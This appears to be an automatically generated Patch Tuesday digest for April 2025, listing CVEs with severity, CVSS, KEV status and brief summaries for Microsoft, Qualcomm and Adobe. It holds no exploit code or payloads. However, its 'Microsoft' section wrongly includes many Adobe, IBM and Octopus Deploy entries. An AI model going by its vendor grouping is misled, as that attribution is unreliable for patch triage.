Patch Tuesday — April 2025
2025-04-08 · 945 CVEs
CVEs published or modified the week of 2025-04-08, partitioned by vendor.
Microsoft (149 CVEs)
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-0539 | High | 8.8 | — | 2025-04-10 | In affected Microsoft Windows versions of Octopus Deploy, the server can be coerced into sending server-side requests that contain authentication material allowing a suitably positioned attacker to compromise the account running Octopus Se… |
CVE-2025-29794 | High | 8.8 | — | 2025-04-08 | Improper authorization in Microsoft Office SharePoint allows an authorized attacker to execute code over a network. |
CVE-2025-27740 | High | 8.8 | — | 2025-04-08 | Weak authentication in Windows Active Directory Certificate Services allows an authorized attacker to elevate privileges over a network. |
CVE-2025-27481 | High | 8.8 | — | 2025-04-08 | Stack-based buffer overflow in Windows Telephony Service allows an unauthorized attacker to execute code over a network. |
CVE-2025-27477 | High | 8.8 | — | 2025-04-08 | Heap-based buffer overflow in Windows Telephony Service allows an unauthorized attacker to execute code over a network. |
CVE-2025-26669 | High | 8.8 | — | 2025-04-08 | Out-of-bounds read in Windows Routing and Remote Access Service (RRAS) allows an unauthorized attacker to disclose information over a network. |
CVE-2025-26647 | High | 8.8 | — | 2025-04-08 | Improper input validation in Windows Kerberos allows an authorized attacker to elevate privileges over a network. |
CVE-2025-21222 | High | 8.8 | — | 2025-04-08 | Heap-based buffer overflow in Windows Telephony Service allows an unauthorized attacker to execute code over a network. |
CVE-2025-21221 | High | 8.8 | — | 2025-04-08 | Heap-based buffer overflow in Windows Telephony Service allows an unauthorized attacker to execute code over a network. |
CVE-2025-21205 | High | 8.8 | — | 2025-04-08 | Heap-based buffer overflow in Windows Telephony Service allows an unauthorized attacker to execute code over a network. |
CVE-2025-1095 | High | 8.8 | — | 2025-04-08 | IBM Personal Communications v14 and v15 include a Windows service that is vulnerable to local privilege escalation (LPE). |
CVE-2025-27737 | High | 8.6 | — | 2025-04-08 | Improper input validation in Windows Security Zone Mapping allows an unauthorized attacker to bypass a security feature locally. |
CVE-2025-26678 | High | 8.4 | — | 2025-04-08 | Improper access control in Windows Defender Application Control (WDAC) allows an unauthorized attacker to bypass a security feature locally. |
CVE-2025-27482 | High | 8.1 | — | 2025-04-08 | Sensitive data storage in improperly locked memory in Remote Desktop Gateway Service allows an unauthorized attacker to execute code over a network. |
CVE-2025-27480 | High | 8.1 | — | 2025-04-08 | Use after free in Remote Desktop Gateway Service allows an unauthorized attacker to execute code over a network. |
CVE-2025-26671 | High | 8.1 | — | 2025-04-08 | Use after free in Windows Remote Desktop Services allows an unauthorized attacker to execute code over a network. |
CVE-2025-26670 | High | 8.1 | — | 2025-04-08 | Use after free in Windows LDAP - Lightweight Directory Access Protocol allows an unauthorized attacker to execute code over a network. |
CVE-2025-26663 | High | 8.1 | — | 2025-04-08 | Use after free in Windows LDAP - Lightweight Directory Access Protocol allows an unauthorized attacker to execute code over a network. |
CVE-2025-27487 | High | 8.0 | — | 2025-04-08 | Heap-based buffer overflow in Remote Desktop Client allows an authorized attacker to execute code over a network. |
CVE-2025-30304 | High | 7.8 | — | 2025-04-08 | Adobe Framemaker versions 2020.8, 2022.6 and earlier are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. |
CVE-2025-30299 | High | 7.8 | — | 2025-04-08 | Adobe Framemaker versions 2020.8, 2022.6 and earlier are affected by a Heap-based Buffer Overflow vulnerability that could result in arbitrary code execution in the context of the current user. |
CVE-2025-30298 | High | 7.8 | — | 2025-04-08 | Adobe Framemaker versions 2020.8, 2022.6 and earlier are affected by a Stack-based Buffer Overflow vulnerability that could result in arbitrary code execution in the context of the current user. |
CVE-2025-30297 | High | 7.8 | — | 2025-04-08 | Adobe Framemaker versions 2020.8, 2022.6 and earlier are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. |
CVE-2025-30296 | High | 7.8 | — | 2025-04-08 | Adobe Framemaker versions 2020.8, 2022.6 and earlier are affected by an Integer Underflow (Wrap or Wraparound) vulnerability that could result in arbitrary code execution in the context of the current user. |
CVE-2025-30295 | High | 7.8 | — | 2025-04-08 | Adobe Framemaker versions 2020.8, 2022.6 and earlier are affected by a Heap-based Buffer Overflow vulnerability that could result in arbitrary code execution in the context of the current user. |
CVE-2025-29824 | High | 7.8 | KEV | 2025-04-08 | Use after free in Windows Common Log File System Driver allows an authorized attacker to elevate privileges locally. |
CVE-2025-29823 | High | 7.8 | — | 2025-04-08 | Use after free in Microsoft Office Excel allows an unauthorized attacker to execute code locally. |
CVE-2025-29822 | High | 7.8 | — | 2025-04-08 | Incomplete list of disallowed inputs in Microsoft Office OneNote allows an unauthorized attacker to bypass a security feature locally. |
CVE-2025-29820 | High | 7.8 | — | 2025-04-08 | Use after free in Microsoft Office Word allows an unauthorized attacker to execute code locally. |
CVE-2025-29812 | High | 7.8 | — | 2025-04-08 | Untrusted pointer dereference in Windows Kernel Memory allows an authorized attacker to elevate privileges locally. |
CVE-2025-29811 | High | 7.8 | — | 2025-04-08 | Improper input validation in Windows Mobile Broadband allows an authorized attacker to elevate privileges locally. |
CVE-2025-29801 | High | 7.8 | — | 2025-04-08 | Incorrect default permissions in Microsoft AutoUpdate (MAU) allows an authorized attacker to elevate privileges locally. |
CVE-2025-29800 | High | 7.8 | — | 2025-04-08 | Improper privilege management in Microsoft AutoUpdate (MAU) allows an authorized attacker to elevate privileges locally. |
CVE-2025-29791 | High | 7.8 | — | 2025-04-08 | Access of resource using incompatible type ('type confusion') in Microsoft Office allows an unauthorized attacker to execute code locally. |
CVE-2025-27752 | High | 7.8 | — | 2025-04-08 | Heap-based buffer overflow in Microsoft Office Excel allows an unauthorized attacker to execute code locally. |
CVE-2025-27751 | High | 7.8 | — | 2025-04-08 | Use after free in Microsoft Office Excel allows an unauthorized attacker to execute code locally. |
CVE-2025-27750 | High | 7.8 | — | 2025-04-08 | Use after free in Microsoft Office Excel allows an unauthorized attacker to execute code locally. |
CVE-2025-27749 | High | 7.8 | — | 2025-04-08 | Use after free in Microsoft Office allows an unauthorized attacker to execute code locally. |
CVE-2025-27748 | High | 7.8 | — | 2025-04-08 | Use after free in Microsoft Office allows an unauthorized attacker to execute code locally. |
CVE-2025-27747 | High | 7.8 | — | 2025-04-08 | Use after free in Microsoft Office Word allows an unauthorized attacker to execute code locally. |
CVE-2025-27746 | High | 7.8 | — | 2025-04-08 | Use after free in Microsoft Office allows an unauthorized attacker to execute code locally. |
CVE-2025-27745 | High | 7.8 | — | 2025-04-08 | Use after free in Microsoft Office allows an unauthorized attacker to execute code locally. |
CVE-2025-27744 | High | 7.8 | — | 2025-04-08 | Improper access control in Microsoft Office allows an authorized attacker to elevate privileges locally. |
CVE-2025-27743 | High | 7.8 | — | 2025-04-08 | Untrusted search path in System Center allows an authorized attacker to elevate privileges locally. |
CVE-2025-27741 | High | 7.8 | — | 2025-04-08 | Out-of-bounds read in Windows NTFS allows an unauthorized attacker to elevate privileges locally. |
CVE-2025-27739 | High | 7.8 | — | 2025-04-08 | Untrusted pointer dereference in Windows Kernel allows an authorized attacker to elevate privileges locally. |
CVE-2025-27733 | High | 7.8 | — | 2025-04-08 | Out-of-bounds read in Windows NTFS allows an unauthorized attacker to elevate privileges locally. |
CVE-2025-27731 | High | 7.8 | — | 2025-04-08 | Improper input validation in OpenSSH for Windows allows an authorized attacker to elevate privileges locally. |
CVE-2025-27730 | High | 7.8 | — | 2025-04-08 | Use after free in Windows Digital Media allows an authorized attacker to elevate privileges locally. |
CVE-2025-27729 | High | 7.8 | — | 2025-04-08 | Use after free in Windows Shell allows an unauthorized attacker to execute code locally. |
CVE-2025-27728 | High | 7.8 | — | 2025-04-08 | Out-of-bounds read in Windows Kernel-Mode Drivers allows an authorized attacker to elevate privileges locally. |
CVE-2025-27727 | High | 7.8 | — | 2025-04-08 | Improper link resolution before file access ('link following') in Windows Installer allows an authorized attacker to elevate privileges locally. |
CVE-2025-27490 | High | 7.8 | — | 2025-04-08 | Heap-based buffer overflow in Windows Bluetooth Service allows an authorized attacker to elevate privileges locally. |
CVE-2025-27489 | High | 7.8 | — | 2025-04-08 | Improper input validation in Azure Local allows an authorized attacker to elevate privileges locally. |
CVE-2025-27483 | High | 7.8 | — | 2025-04-08 | Out-of-bounds read in Windows NTFS allows an unauthorized attacker to elevate privileges locally. |
CVE-2025-27476 | High | 7.8 | — | 2025-04-08 | Use after free in Windows Digital Media allows an authorized attacker to elevate privileges locally. |
CVE-2025-27467 | High | 7.8 | — | 2025-04-08 | Use after free in Windows Digital Media allows an authorized attacker to elevate privileges locally. |
CVE-2025-27200 | High | 7.8 | — | 2025-04-08 | Animate versions 24.0.7, 23.0.10 and earlier are affected by a Use After Free vulnerability that could result in arbitrary code execution in the context of the current user. |
CVE-2025-27199 | High | 7.8 | — | 2025-04-08 | Animate versions 24.0.7, 23.0.10 and earlier are affected by a Heap-based Buffer Overflow vulnerability that could result in arbitrary code execution in the context of the current user. |
CVE-2025-27198 | High | 7.8 | — | 2025-04-08 | Photoshop Desktop versions 25.12.1, 26.4.1 and earlier are affected by a Heap-based Buffer Overflow vulnerability that could result in arbitrary code execution in the context of the current user. |
CVE-2025-27196 | High | 7.8 | — | 2025-04-08 | Premiere Pro versions 25.1, 24.6.4 and earlier are affected by a Heap-based Buffer Overflow vulnerability that could result in arbitrary code execution in the context of the current user. |
CVE-2025-27195 | High | 7.8 | — | 2025-04-08 | Media Encoder versions 25.1, 24.6.4 and earlier are affected by a Heap-based Buffer Overflow vulnerability that could result in arbitrary code execution in the context of the current user. |
CVE-2025-27194 | High | 7.8 | — | 2025-04-08 | Media Encoder versions 25.1, 24.6.4 and earlier are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. |
CVE-2025-27193 | High | 7.8 | — | 2025-04-08 | Bridge versions 14.1.5, 15.0.2 and earlier are affected by a Heap-based Buffer Overflow vulnerability that could result in arbitrary code execution in the context of the current user. |
CVE-2025-27183 | High | 7.8 | — | 2025-04-08 | After Effects versions 25.1, 24.6.4 and earlier are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. |
CVE-2025-27182 | High | 7.8 | — | 2025-04-08 | After Effects versions 25.1, 24.6.4 and earlier are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. |
CVE-2025-26688 | High | 7.8 | — | 2025-04-08 | Stack-based buffer overflow in Microsoft Virtual Hard Drive allows an authorized attacker to elevate privileges locally. |
CVE-2025-26679 | High | 7.8 | — | 2025-04-08 | Use after free in RPC Endpoint Mapper Service allows an authorized attacker to elevate privileges locally. |
CVE-2025-26675 | High | 7.8 | — | 2025-04-08 | Out-of-bounds read in Windows Subsystem for Linux allows an authorized attacker to elevate privileges locally. |
CVE-2025-26674 | High | 7.8 | — | 2025-04-08 | Heap-based buffer overflow in Windows Media allows an authorized attacker to execute code locally. |
CVE-2025-26666 | High | 7.8 | — | 2025-04-08 | Heap-based buffer overflow in Windows Media allows an authorized attacker to execute code locally. |
CVE-2025-26648 | High | 7.8 | — | 2025-04-08 | Sensitive data storage in improperly locked memory in Windows Kernel allows an authorized attacker to elevate privileges locally. |
CVE-2025-26642 | High | 7.8 | — | 2025-04-08 | Out-of-bounds read in Microsoft Office allows an unauthorized attacker to execute code locally. |
CVE-2025-26639 | High | 7.8 | — | 2025-04-08 | Integer overflow or wraparound in Windows USB Print Driver allows an authorized attacker to elevate privileges locally. |
CVE-2025-24074 | High | 7.8 | — | 2025-04-08 | Improper input validation in Windows DWM Core Library allows an authorized attacker to elevate privileges locally. |
CVE-2025-24073 | High | 7.8 | — | 2025-04-08 | Improper input validation in Windows DWM Core Library allows an authorized attacker to elevate privileges locally. |
CVE-2025-24062 | High | 7.8 | — | 2025-04-08 | Improper input validation in Windows DWM Core Library allows an authorized attacker to elevate privileges locally. |
CVE-2025-24060 | High | 7.8 | — | 2025-04-08 | Improper input validation in Windows DWM Core Library allows an authorized attacker to elevate privileges locally. |
CVE-2025-24058 | High | 7.8 | — | 2025-04-08 | Improper input validation in Windows DWM Core Library allows an authorized attacker to elevate privileges locally. |
CVE-2025-21204 | High | 7.8 | — | 2025-04-08 | Improper link resolution before file access ('link following') in Windows Update Stack allows an authorized attacker to elevate privileges locally. |
CVE-2025-29816 | High | 7.5 | — | 2025-04-08 | Improper input validation in Microsoft Office Word allows an unauthorized attacker to bypass a security feature over a network. |
CVE-2025-29810 | High | 7.5 | — | 2025-04-08 | Improper access control in Active Directory Domain Services allows an authorized attacker to elevate privileges over a network. |
CVE-2025-29805 | High | 7.5 | — | 2025-04-08 | Exposure of sensitive information to an unauthorized actor in Outlook for Android allows an unauthorized attacker to disclose information over a network. |
CVE-2025-27486 | High | 7.5 | — | 2025-04-08 | Uncontrolled resource consumption in Windows Standards-Based Storage Management Service allows an unauthorized attacker to deny service over a network. |
CVE-2025-27485 | High | 7.5 | — | 2025-04-08 | Uncontrolled resource consumption in Windows Standards-Based Storage Management Service allows an unauthorized attacker to deny service over a network. |
CVE-2025-27484 | High | 7.5 | — | 2025-04-08 | Sensitive data storage in improperly locked memory in Windows Universal Plug and Play (UPnP) Device Host allows an authorized attacker to elevate privileges over a network. |
CVE-2025-27479 | High | 7.5 | — | 2025-04-08 | Insufficient resource pool in Windows Kerberos allows an unauthorized attacker to deny service over a network. |
CVE-2025-27473 | High | 7.5 | — | 2025-04-08 | Uncontrolled resource consumption in Windows HTTP.sys allows an unauthorized attacker to deny service over a network. |
CVE-2025-27470 | High | 7.5 | — | 2025-04-08 | Uncontrolled resource consumption in Windows Standards-Based Storage Management Service allows an unauthorized attacker to deny service over a network. |
CVE-2025-27469 | High | 7.5 | — | 2025-04-08 | Uncontrolled resource consumption in Windows LDAP - Lightweight Directory Access Protocol allows an unauthorized attacker to deny service over a network. |
CVE-2025-26687 | High | 7.5 | — | 2025-04-08 | Use after free in Windows Win32K - GRFX allows an unauthorized attacker to elevate privileges over a network. |
CVE-2025-26686 | High | 7.5 | — | 2025-04-08 | Sensitive data storage in improperly locked memory in Windows TCP/IP allows an unauthorized attacker to execute code over a network. |
CVE-2025-26682 | High | 7.5 | — | 2025-04-08 | Allocation of resources without limits or throttling in ASP.NET Core allows an unauthorized attacker to deny service over a network. |
CVE-2025-26680 | High | 7.5 | — | 2025-04-08 | Uncontrolled resource consumption in Windows Standards-Based Storage Management Service allows an unauthorized attacker to deny service over a network. |
CVE-2025-26673 | High | 7.5 | — | 2025-04-08 | Uncontrolled resource consumption in Windows LDAP - Lightweight Directory Access Protocol allows an unauthorized attacker to deny service over a network. |
CVE-2025-26668 | High | 7.5 | — | 2025-04-08 | Heap-based buffer overflow in Windows Routing and Remote Access Service (RRAS) allows an unauthorized attacker to execute code over a network. |
CVE-2025-26652 | High | 7.5 | — | 2025-04-08 | Uncontrolled resource consumption in Windows Standards-Based Storage Management Service allows an unauthorized attacker to deny service over a network. |
CVE-2025-26641 | High | 7.5 | — | 2025-04-08 | Uncontrolled resource consumption in Windows Cryptographic Services allows an unauthorized attacker to deny service over a network. |
CVE-2025-21174 | High | 7.5 | — | 2025-04-08 | Uncontrolled resource consumption in Windows Standards-Based Storage Management Service allows an unauthorized attacker to deny service over a network. |
CVE-2025-29804 | High | 7.3 | — | 2025-04-08 | Improper access control in Visual Studio allows an authorized attacker to elevate privileges locally. |
CVE-2025-29802 | High | 7.3 | — | 2025-04-08 | Improper access control in Visual Studio allows an authorized attacker to elevate privileges locally. |
CVE-2025-29792 | High | 7.3 | — | 2025-04-08 | Use after free in Microsoft Office allows an authorized attacker to elevate privileges locally. |
CVE-2025-26628 | High | 7.3 | — | 2025-04-08 | Insufficiently protected credentials in Azure Local Cluster allows an authorized attacker to disclose information locally. |
CVE-2025-29793 | High | 7.2 | — | 2025-04-08 | Deserialization of untrusted data in Microsoft Office SharePoint allows an authorized attacker to execute code over a network. |
CVE-2025-29809 | High | 7.1 | — | 2025-04-08 | Insecure storage of sensitive information in Windows Kerberos allows an authorized attacker to bypass a security feature locally. |
CVE-2025-27491 | High | 7.1 | — | 2025-04-08 | Use after free in Windows Hyper-V allows an authorized attacker to execute code over a network. |
CVE-2025-27732 | High | 7.0 | — | 2025-04-08 | Sensitive data storage in improperly locked memory in Windows Win32K - GRFX allows an authorized attacker to elevate privileges locally. |
CVE-2025-27492 | High | 7.0 | — | 2025-04-08 | Concurrent execution using shared resource with improper synchronization ('race condition') in Windows Secure Channel allows an authorized attacker to elevate privileges locally. |
CVE-2025-27478 | High | 7.0 | — | 2025-04-08 | Heap-based buffer overflow in Windows Local Security Authority (LSA) allows an authorized attacker to elevate privileges locally. |
CVE-2025-27475 | High | 7.0 | — | 2025-04-08 | Sensitive data storage in improperly locked memory in Windows Update Stack allows an authorized attacker to elevate privileges locally. |
CVE-2025-26665 | High | 7.0 | — | 2025-04-08 | Sensitive data storage in improperly locked memory in Windows upnphost.dll allows an authorized attacker to elevate privileges locally. |
CVE-2025-26649 | High | 7.0 | — | 2025-04-08 | Concurrent execution using shared resource with improper synchronization ('race condition') in Windows Secure Channel allows an authorized attacker to elevate privileges locally. |
CVE-2025-26640 | High | 7.0 | — | 2025-04-08 | Use after free in Windows Digital Media allows an authorized attacker to elevate privileges locally. |
CVE-2025-21191 | High | 7.0 | — | 2025-04-08 | Time-of-check time-of-use (toctou) race condition in Windows Local Security Authority (LSA) allows an authorized attacker to elevate privileges locally. |
CVE-2025-26637 | Medium | 6.8 | — | 2025-04-08 | Protection mechanism failure in Windows BitLocker allows an unauthorized attacker to bypass a security feature with a physical attack. |
CVE-2025-25002 | Medium | 6.8 | — | 2025-04-08 | Insertion of sensitive information into log file in Azure Local Cluster allows an authorized attacker to disclose information over an adjacent network. |
CVE-2025-26681 | Medium | 6.7 | — | 2025-04-08 | Use after free in Windows Win32K - GRFX allows an authorized attacker to elevate privileges locally. |
CVE-2025-27738 | Medium | 6.5 | — | 2025-04-08 | Improper access control in Windows Resilient File System (ReFS) allows an authorized attacker to disclose information over a network. |
CVE-2025-27474 | Medium | 6.5 | — | 2025-04-08 | Use of uninitialized resource in Windows Routing and Remote Access Service (RRAS) allows an unauthorized attacker to disclose information over a network. |
CVE-2025-26676 | Medium | 6.5 | — | 2025-04-08 | Buffer over-read in Windows Routing and Remote Access Service (RRAS) allows an unauthorized attacker to disclose information over a network. |
CVE-2025-26672 | Medium | 6.5 | — | 2025-04-08 | Buffer over-read in Windows Routing and Remote Access Service (RRAS) allows an unauthorized attacker to disclose information over a network. |
CVE-2025-26667 | Medium | 6.5 | — | 2025-04-08 | Exposure of sensitive information to an unauthorized actor in Windows Routing and Remote Access Service (RRAS) allows an unauthorized attacker to disclose information over a network. |
CVE-2025-26664 | Medium | 6.5 | — | 2025-04-08 | Buffer over-read in Windows Routing and Remote Access Service (RRAS) allows an unauthorized attacker to disclose information over a network. |
CVE-2025-26651 | Medium | 6.5 | — | 2025-04-08 | Exposed dangerous method or function in Windows Local Session Manager (LSM) allows an authorized attacker to deny service over a network. |
CVE-2025-26635 | Medium | 6.5 | — | 2025-04-08 | Weak authentication in Windows Hello allows an authorized attacker to bypass a security feature over a network. |
CVE-2025-21203 | Medium | 6.5 | — | 2025-04-08 | Buffer over-read in Windows Routing and Remote Access Service (RRAS) allows an unauthorized attacker to disclose information over a network. |
CVE-2025-21197 | Medium | 6.5 | — | 2025-04-08 | Improper access control in Windows NTFS allows an authorized attacker to disclose file path information under a folder where the attacker doesn't have permission to list content. |
CVE-2025-29819 | Medium | 6.2 | — | 2025-04-08 | External control of file name or path in Azure Portal Windows Admin Center allows an unauthorized attacker to disclose information locally. |
CVE-2025-27735 | Medium | 6.0 | — | 2025-04-08 | Insufficient verification of data authenticity in Windows Virtualization-Based Security (VBS) Enclave allows an authorized attacker to bypass a security feature locally. |
CVE-2025-27471 | Medium | 5.9 | — | 2025-04-08 | Sensitive data storage in improperly locked memory in Microsoft Streaming Service allows an unauthorized attacker to deny service over a network. |
CVE-2025-30303 | Medium | 5.5 | — | 2025-04-08 | Adobe Framemaker versions 2020.8, 2022.6 and earlier are affected by an out-of-bounds read vulnerability that could lead to disclosure of sensitive memory. |
CVE-2025-30302 | Medium | 5.5 | — | 2025-04-08 | Adobe Framemaker versions 2020.8, 2022.6 and earlier are affected by an out-of-bounds read vulnerability that could lead to disclosure of sensitive memory. |
CVE-2025-30301 | Medium | 5.5 | — | 2025-04-08 | Adobe Framemaker versions 2020.8, 2022.6 and earlier are affected by a NULL Pointer Dereference vulnerability that could result in an application denial-of-service. |
CVE-2025-30300 | Medium | 5.5 | — | 2025-04-08 | Adobe Framemaker versions 2020.8, 2022.6 and earlier are affected by a NULL Pointer Dereference vulnerability that could result in an application denial-of-service. |
CVE-2025-29821 | Medium | 5.5 | — | 2025-04-08 | Improper input validation in Dynamics Business Central allows an authorized attacker to disclose information locally. |
CVE-2025-29808 | Medium | 5.5 | — | 2025-04-08 | Use of a cryptographic primitive with a risky implementation in Windows Cryptographic Services allows an authorized attacker to disclose information locally. |
CVE-2025-27742 | Medium | 5.5 | — | 2025-04-08 | Out-of-bounds read in Windows NTFS allows an unauthorized attacker to disclose information locally. |
CVE-2025-27736 | Medium | 5.5 | — | 2025-04-08 | Exposure of sensitive information to an unauthorized actor in Windows Power Dependency Coordinator allows an authorized attacker to disclose information locally. |
CVE-2025-27204 | Medium | 5.5 | — | 2025-04-08 | After Effects versions 25.1, 24.6.4 and earlier are affected by an out-of-bounds read vulnerability that could lead to disclosure of sensitive memory. |
CVE-2025-27202 | Medium | 5.5 | — | 2025-04-08 | Animate versions 24.0.7, 23.0.10 and earlier are affected by an out-of-bounds read vulnerability that could lead to disclosure of sensitive memory. |
CVE-2025-27201 | Medium | 5.5 | — | 2025-04-08 | Animate versions 24.0.7, 23.0.10 and earlier are affected by an out-of-bounds read vulnerability that could lead to disclosure of sensitive memory. |
CVE-2025-27187 | Medium | 5.5 | — | 2025-04-08 | After Effects versions 25.1, 24.6.4 and earlier are affected by an out-of-bounds read vulnerability that could lead to disclosure of sensitive memory. |
CVE-2025-27186 | Medium | 5.5 | — | 2025-04-08 | After Effects versions 25.1, 24.6.4 and earlier are affected by an out-of-bounds read vulnerability that could lead to disclosure of sensitive memory. |
CVE-2025-27185 | Medium | 5.5 | — | 2025-04-08 | After Effects versions 25.1, 24.6.4 and earlier are affected by a NULL Pointer Dereference vulnerability that could result in an application denial-of-service. |
CVE-2025-27184 | Medium | 5.5 | — | 2025-04-08 | After Effects versions 25.1, 24.6.4 and earlier are affected by an out-of-bounds read vulnerability that could lead to disclosure of sensitive memory. |
CVE-2023-42007 | Medium | 5.4 | — | 2025-04-10 | IBM Sterling Control Center 6.2.1, 6.3.1, and 6.4.0 is vulnerable to cross-site scripting. |
CVE-2025-27472 | Medium | 5.4 | — | 2025-04-08 | Protection mechanism failure in Windows Mark of the Web (MOTW) allows an unauthorized attacker to bypass a security feature over a network. |
CVE-2025-26644 | Medium | 5.1 | — | 2025-04-08 | Automated recognition mechanism with inadequate detection or handling of adversarial input perturbations in Windows Hello allows an unauthorized attacker to perform spoofing locally. |
CVE-2023-43035 | Medium | 4.0 | — | 2025-04-10 | IBM Sterling Control Center 6.2.1, 6.3.1, and 6.4.0 allows web pages to be stored locally which can be read by another user on the system. |
Other vendors (796 CVEs across 371 vendors)
Qualcomm · 34 CVEs
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2024-45552 | High | 8.2 | — | 2025-04-07 | Information disclosure may occur during a video call if a device resets due to a non-conforming RTCP packet that doesn`t adhere to RFC standards. |
CVE-2025-21447 | High | 7.8 | — | 2025-04-07 | Memory corruption may occur while processing device IO control call for session control. |
CVE-2025-21443 | High | 7.8 | — | 2025-04-07 | Memory corruption while processing message content in eAVB. |
CVE-2025-21442 | High | 7.8 | — | 2025-04-07 | Memory corruption while transmitting packet mapping information with invalid header payload size. |
CVE-2025-21441 | High | 7.8 | — | 2025-04-07 | Memory corruption when IOCTL call is invoked from user-space to write board data to WLAN driver. |
CVE-2025-21440 | High | 7.8 | — | 2025-04-07 | Memory corruption when IOCTL call is invoked from user-space to write board data to WLAN driver. |
CVE-2025-21439 | High | 7.8 | — | 2025-04-07 | Memory corruption may occur while reading board data via IOCTL call when the WLAN driver copies the content to the provided output buffer. |
CVE-2025-21438 | High | 7.8 | — | 2025-04-07 | Memory corruption while IOCTL call is invoked from user-space to read board data. |
CVE-2025-21437 | High | 7.8 | — | 2025-04-07 | Memory corruption while processing memory map or unmap IOCTL operations simultaneously. |
CVE-2025-21436 | High | 7.8 | — | 2025-04-07 | Memory corruption may occur while initiating two IOCTL calls simultaneously to create processes from two different threads. |
CVE-2025-21423 | High | 7.8 | — | 2025-04-07 | Memory corruption occurs when handling client calls to EnableTestMode through an Escape call. |
CVE-2025-21421 | High | 7.8 | — | 2025-04-07 | Memory corruption while processing escape code in API. |
CVE-2024-45557 | High | 7.8 | — | 2025-04-07 | Memory corruption can occur when TME processes addresses from TZ and MPSS requests without proper validation. |
CVE-2024-43067 | High | 7.8 | — | 2025-04-07 | Memory corruption occurs during the copying of read data from the EEPROM because the IO configuration is exposed as shared memory. |
CVE-2024-43066 | High | 7.8 | — | 2025-04-07 | Memory corruption while handling file descriptor during listener registration/de-registration. |
CVE-2024-43058 | High | 7.8 | — | 2025-04-07 | Memory corruption while processing IOCTL calls. |
CVE-2024-45549 | High | 7.7 | — | 2025-04-07 | Information disclosure while creating MQ channels. |
CVE-2025-21448 | High | 7.5 | — | 2025-04-07 | Transient DOS may occur while parsing SSID in action frames. |
CVE-2025-21435 | High | 7.5 | — | 2025-04-07 | Transient DOS may occur while parsing extended IE in beacon. |
CVE-2025-21434 | High | 7.5 | — | 2025-04-07 | Transient DOS may occur while parsing EHT operation IE or EHT capability IE. |
CVE-2025-21430 | High | 7.5 | — | 2025-04-07 | Transient DOS while connecting STA to AP and initiating ADD TS request from AP to establish TSpec session. |
CVE-2025-21429 | High | 7.5 | — | 2025-04-07 | Memory corruption occurs while connecting a STA to an AP and initiating an ADD TS request. |
CVE-2025-21428 | High | 7.5 | — | 2025-04-07 | Memory corruption occurs while connecting a STA to an AP and initiating an ADD TS request from the AP to establish a TSpec session. |
CVE-2024-33058 | High | 7.5 | — | 2025-04-07 | Memory corruption while assigning memory from the source DDR memory(HLOS) to ADSP. |
CVE-2025-21425 | High | 7.3 | — | 2025-04-07 | Memory corruption may occur due top improper access control in HAB process. |
CVE-2024-43065 | High | 7.1 | — | 2025-04-07 | Cryptographic issues while generating an asymmetric key pair for RKP use cases. |
CVE-2024-49848 | Medium | 6.7 | — | 2025-04-07 | Memory corruption while processing multiple IOCTL calls from HLOS to DSP. |
CVE-2024-45544 | Medium | 6.6 | — | 2025-04-07 | Memory corruption while processing IOCTL calls to add route entry in the HW. |
CVE-2024-45543 | Medium | 6.6 | — | 2025-04-07 | Memory corruption while accessing MSM channel map and mixer functions. |
CVE-2024-45540 | Medium | 6.6 | — | 2025-04-07 | Memory corruption while invoking IOCTL map buffer request from userspace. |
CVE-2024-45556 | Medium | 6.5 | — | 2025-04-07 | Cryptographic issue may arise because the access control configuration permits Linux to read key registers in TCSR. |
CVE-2024-45551 | Medium | 6.2 | — | 2025-04-07 | Cryptographic issue occurs during PIN/password verification using Gatekeeper, where RPMB writes can be dropped on verification failure, potentially leading to a user throttling bypass. |
CVE-2025-21431 | Medium | 5.5 | — | 2025-04-07 | Information disclosure may be there when a guest VM is connected. |
CVE-2024-43046 | Medium | 5.5 | — | 2025-04-07 | There may be information disclosure during memory re-allocation in TZ Secure OS. |
Adobe · 26 CVEs
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-30282 | Critical | 9.1 | — | 2025-04-08 | ColdFusion versions 2023.12, 2021.18, 2025.0 and earlier are affected by an Improper Authentication vulnerability that could result in arbitrary code execution in the context of the current user. |
CVE-2025-30281 | Critical | 9.1 | — | 2025-04-08 | ColdFusion versions 2023.12, 2021.18, 2025.0 and earlier are affected by an Improper Access Control vulnerability that could result in arbitrary code execution. |
CVE-2025-24447 | Critical | 9.1 | — | 2025-04-08 | ColdFusion versions 2023.12, 2021.18, 2025.0 and earlier are affected by a Deserialization of Untrusted Data vulnerability that could result in arbitrary code execution in the context of the current user resulting in a High impact to Confi… |
CVE-2025-24446 | Critical | 9.1 | — | 2025-04-08 | ColdFusion versions 2023.12, 2021.18, 2025.0 and earlier are affected by an Improper Input Validation vulnerability that could result in arbitrary code execution. |
CVE-2025-30290 | High | 8.7 | — | 2025-04-08 | ColdFusion versions 2023.12, 2021.18, 2025.0 and earlier are affected by an Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability that could lead to a security feature bypass. |
CVE-2025-30286 | High | 8.4 | — | 2025-04-08 | ColdFusion versions 2023.12, 2021.18, 2025.0 and earlier are affected by an Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') vulnerability that could lead in arbitrary code execution by an attacker. |
CVE-2025-30285 | High | 8.4 | — | 2025-04-08 | ColdFusion versions 2023.12, 2021.18, 2025.0 and earlier are affected by a Deserialization of Untrusted Data vulnerability that could result in arbitrary code execution in the context of the current user. |
CVE-2025-30284 | High | 8.4 | — | 2025-04-08 | ColdFusion versions 2023.12, 2021.18, 2025.0 and earlier are affected by a Deserialization of Untrusted Data vulnerability that could result in arbitrary code execution in the context of the current user. |
CVE-2025-30289 | High | 8.2 | — | 2025-04-08 | ColdFusion versions 2023.12, 2021.18, 2025.0 and earlier are affected by an Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') vulnerability that could lead in arbitrary code execution by an attacker. |
